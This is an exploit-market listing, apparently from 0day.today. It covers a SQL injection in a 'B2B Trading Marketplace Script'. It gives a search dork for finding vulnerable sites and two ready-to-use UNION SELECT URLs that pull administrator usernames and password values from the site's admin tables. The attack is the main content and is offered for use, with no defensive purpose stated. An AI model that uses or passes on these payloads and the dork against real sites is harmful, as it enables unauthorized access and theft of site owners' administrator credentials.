[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

B2B Trading Marketplace SQL Injection Vulnerability

Author
AnGrY BoY
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10392
Category
web applications
Date add
25-12-2009
Platform
unsorted
===================================================
B2B Trading Marketplace SQL Injection Vulnerability
===================================================

[+]  B2B Trading Marketplace SQL Injection Vulnerability
 
[+]  Software : B2B Trading Marketplace Script
[+]  Author   : AnGrY BoY
=====================================================================================
 
 
[+]  Dork     : cat_sell.php?cid=  or  selloffers.php?cid=
 
 
[+]expolit:
                                       
http://localhost/path/selloffers.php?cid=1+union+all+select 1,concat(sb_admin_name,0x3e,sb_pwd),3,4,5,6,7,8+from+b2b_admin--   
 
or
                             
http://localhost/path/cat_sell.php?cid=1+union+all+select 1,concat(sb_admin_name,0x3e,sb_pwd),3,4,5,6,7,8+from+sbbleads_admin--
 
 
[+] example
[+] http://www.youtube.com/watch?v=uEK_Ah3htr0
======================================================================================



#  0day.today [2024-11-16]  #